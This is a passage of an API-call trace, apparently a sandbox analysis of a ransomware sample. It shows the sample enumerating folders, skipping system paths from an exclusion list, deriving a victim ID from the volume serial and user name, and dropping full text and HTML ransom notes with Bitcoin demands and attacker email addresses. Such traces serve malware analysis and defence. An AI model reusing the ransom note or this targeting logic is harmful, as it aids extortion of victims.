	[0157.704] FindNextFileW (in: hFindFile=0xfb9ab0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0157.704] FindClose (in: hFindFile=0xfb9ab0 | out: hFindFile=0xfb9ab0) returned 1
	[0157.704] FindClose (in: hFindFile=0xfb9ab0 | out: hFindFile=0xfb9ab0) returned 0
	[0157.713] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\PerfLogs" | out: lpString1="C:\\PerfLogs") returned="C:\\PerfLogs"
	[0157.713] lstrcatW (in: lpString1="C:\\PerfLogs", lpString2="\\*.*" | out: lpString1="C:\\PerfLogs\\*.*") returned="C:\\PerfLogs\\*.*"
	[0157.713] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.714] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.714] wsprintfW (in: param_1=0x18d7b0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\PerfLogs\\HELP_DECRYPT_YOUR_FILES.TXT") returned 39
	[0157.714] CreateFileW (lpFileName="C:\\PerfLogs\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\perflogs\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.739] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0157.739] WriteFile (in: hFile=0x378, lpBuffer=0x18cb68*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18da8c, lpOverlapped=0x0 | out: lpBuffer=0x18cb68*, lpNumberOfBytesWritten=0x18da8c*=0xc46, lpOverlapped=0x0) returned 1
	[0157.742] CloseHandle (hObject=0x378) returned 1
	[0157.742] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cb38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cb38*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.743] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.743] GetUserNameA (in: lpBuffer=0x18ca1c, pcbBuffer=0x18cb34 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cb34) returned 1
	[0157.744] wsprintfW (in: param_1=0x18d9b8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0157.744] CreateFileW (lpFileName="C:\\PerfLogs\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\perflogs\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.745] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0157.745] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0157.745] WriteFile (in: hFile=0x378, lpBuffer=0x18d9b8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18da94, lpOverlapped=0x0 | out: lpBuffer=0x18d9b8*, lpNumberOfBytesWritten=0x18da94*=0x30, lpOverlapped=0x0) returned 1
	[0157.745] CloseHandle (hObject=0x378) returned 1
	[0157.746] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.746] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.746] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0157.746] wsprintfW (in: param_1=0x18d770, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\PerfLogs\\HELP_DECRYPT_YOUR_FILES.HTML") returned 40
	[0157.746] CreateFileW (lpFileName="C:\\PerfLogs\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\perflogs\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.747] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0157.747] WriteFile (in: hFile=0x378, lpBuffer=0x18cf64*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18da88, lpOverlapped=0x0 | out: lpBuffer=0x18cf64*, lpNumberOfBytesWritten=0x18da88*=0x808, lpOverlapped=0x0) returned 1
	[0157.750] CloseHandle (hObject=0x378) returned 1
	[0157.751] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0157.751] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cf4c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cf4c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.752] GetUserNameA (in: lpBuffer=0x18ce30, pcbBuffer=0x18cf48 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cf48) returned 1
	[0157.753] wsprintfA (in: param_1=0x18d978, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0157.753] CreateFileW (lpFileName="C:\\PerfLogs\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\perflogs\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.754] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0157.754] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0157.754] WriteFile (in: hFile=0x378, lpBuffer=0x18d978*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18da90, lpOverlapped=0x0 | out: lpBuffer=0x18d978*, lpNumberOfBytesWritten=0x18da90*=0x43, lpOverlapped=0x0) returned 1
	[0157.754] CloseHandle (hObject=0x378) returned 1
	[0157.755] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*" (normalized: "c:\\perflogs\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x778d63c3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0157.755] lstrlenW (lpString="C:\\PerfLogs\\*.*") returned 15
	[0157.755] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.755] CharLowerBuffW (in: lpsz="C:\\PerfLogs\\*.*", cchLength=0xf | out: lpsz="c:\\perflogs\\*.*") returned 0xf
	[0157.755] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.755] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="windows") returned 0x0
	[0157.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.756] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="boot") returned 0x0
	[0157.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.756] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="system volume information") returned 0x0
	[0157.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.756] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0157.756] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.757] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="temp") returned 0x0
	[0157.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.757] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="program files") returned 0x0
	[0157.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.757] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="program files (x86)") returned 0x0
	[0157.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.757] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="appdata") returned 0x0
	[0157.757] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.758] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="application data") returned 0x0
	[0157.758] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.758] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="winnt") returned 0x0
	[0157.758] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.758] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="tmp") returned 0x0
	[0157.758] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.758] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="cache") returned 0x0
	[0157.759] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.759] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="temporary internet files") returned 0x0
	[0157.759] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.759] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="webcache") returned 0x0
	[0157.759] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.759] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="inetcache") returned 0x0
	[0157.759] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.760] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="nvidia") returned 0x0
	[0157.760] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.760] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="packages") returned 0x0
	[0157.760] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.760] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="cookies") returned 0x0
	[0157.760] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.760] StrStrW (lpFirst="c:\\perflogs\\*.*", lpSrch="programdata") returned 0x0
	[0157.761] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0157.761] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0157.761] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x778d63c3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0157.761] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0157.761] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x778d63c3, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x778d63c3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x778fc7ad, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0157.761] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x778d63c3, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x778d63c3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x778d63c3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0157.761] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x778d63c3, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x778d63c3, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x778d63c3, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0157.761] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0157.762] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0157.762] FindNextFileW (in: hFindFile=0xfb9b70, lpFindFileData=0x18efe4 | out: lpFindFileData=0x18efe4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xdf5d6eaf, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xdf5d6eaf, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x770b6e36, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1
	[0157.762] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1
	[0157.762] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1
	[0157.762] lstrcpyW (in: lpString1=0x18e9cc, lpString2="C:" | out: lpString1="C:") returned="C:"
	[0157.763] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\"
	[0157.763] lstrcatW (in: lpString1="C:\\", lpString2="Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files"
	[0157.763] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files"
	[0157.763] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\"
	[0157.763] lstrcpyW (in: lpString1=0x18dab4, lpString2="C:\\Program Files\\" | out: lpString1="C:\\Program Files\\") returned="C:\\Program Files\\"
	[0157.763] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="*.*" | out: lpString1="C:\\Program Files\\*.*") returned="C:\\Program Files\\*.*"
	[0157.763] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*" (normalized: "c:\\program files\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xdf5d6eaf, ftLastAccessTime.dwHighDateTime=0x1d976a2, ftLastWriteTime.dwLowDateTime=0xdf5d6eaf, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0157.764] lstrlenW (lpString="C:\\Program Files\\*.*") returned 20
	[0157.764] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0157.764] CharLowerBuffW (in: lpsz="C:\\Program Files\\*.*", cchLength=0x14 | out: lpsz="c:\\program files\\*.*") returned 0x14
	[0157.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.764] StrStrW (lpFirst="c:\\program files\\*.*", lpSrch="windows") returned 0x0
	[0157.764] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.764] StrStrW (lpFirst="c:\\program files\\*.*", lpSrch="boot") returned 0x0
	[0157.765] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.765] StrStrW (lpFirst="c:\\program files\\*.*", lpSrch="system volume information") returned 0x0
	[0157.765] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.765] StrStrW (lpFirst="c:\\program files\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0157.765] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.765] StrStrW (lpFirst="c:\\program files\\*.*", lpSrch="temp") returned 0x0
	[0157.765] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0157.765] StrStrW (lpFirst="c:\\program files\\*.*", lpSrch="program files") returned="program files\\*.*"
	[0157.765] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0157.766] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Program Files" | out: lpString1="C:\\Program Files") returned="C:\\Program Files"
	[0157.766] lstrcatW (in: lpString1="C:\\Program Files", lpString2="\\*.*" | out: lpString1="C:\\Program Files\\*.*") returned="C:\\Program Files\\*.*"
	[0157.766] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.766] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.766] wsprintfW (in: param_1=0x18d7b0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Program Files\\HELP_DECRYPT_YOUR_FILES.TXT") returned 44
	[0157.766] CreateFileW (lpFileName="C:\\Program Files\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\program files\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.870] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0157.870] WriteFile (in: hFile=0x378, lpBuffer=0x18cb68*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18da8c, lpOverlapped=0x0 | out: lpBuffer=0x18cb68*, lpNumberOfBytesWritten=0x18da8c*=0xc46, lpOverlapped=0x0) returned 1
	[0157.873] CloseHandle (hObject=0x378) returned 1
	[0157.874] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cb38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cb38*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0157.875] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0157.875] GetUserNameA (in: lpBuffer=0x18ca1c, pcbBuffer=0x18cb34 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cb34) returned 1
	[0157.877] wsprintfW (in: param_1=0x18d9b8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0157.877] CreateFileW (lpFileName="C:\\Program Files\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\program files\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.877] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0157.877] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0157.877] WriteFile (in: hFile=0x378, lpBuffer=0x18d9b8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18da94, lpOverlapped=0x0 | out: lpBuffer=0x18d9b8*, lpNumberOfBytesWritten=0x18da94*=0x30, lpOverlapped=0x0) returned 1
	[0157.878] CloseHandle (hObject=0x378) returned 1
	[0157.878] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0157.879] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0157.879] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0157.879] wsprintfW (in: param_1=0x18d770, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Program Files\\HELP_DECRYPT_YOUR_FILES.HTML") returned 45
	[0157.879] CreateFileW (lpFileName="C:\\Program Files\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\program files\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0157.879] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0157.880] WriteFile (in: hFile=0x378, lpBuffer=0x18cf64*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18da88, lpOverlapped=0x0 | out: lpBuffer=0x18cf64*, lpNumberOfBytesWritten=0x18da88*=0x808, lpOverlapped=0x0) returned 1
	[0157.883] CloseHandle (hObject=0x378) returned 1
	[0157.883] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
